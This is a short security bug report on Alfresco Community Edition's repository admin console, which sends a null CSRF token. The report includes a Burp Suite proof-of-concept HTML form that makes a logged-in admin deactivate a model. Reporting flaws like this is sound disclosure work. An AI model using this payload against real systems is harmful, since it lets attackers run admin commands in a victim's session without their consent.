On security testing of vanilla install of Community Edition 2016-12 on Debian Jessie I noted in the repo admin console the alf-csrftoken URL parameter is set to "null", and the form requests have no alf-csrftoken set.
On testing I was able to issue a CSRF to deactivate a model, presumably any other admin console commands can be run via CSRF if an admin is logged into the Repo console visits a malicious web page.
<!-- CSRF PoC - generated by Burp Suite Professional -->
<form action="http://192.168.56.103:8080/alfresco/s/admin/admin-repoconsole?t=%2Fadmin%2Fadmin-repoconsole&alf-csrftoken=null" method="POST" enctype="multipart/form-data">
<input type="hidden" name="repo-cmd" value="deactivate model model1" />
<input type="submit" value="Submit request" />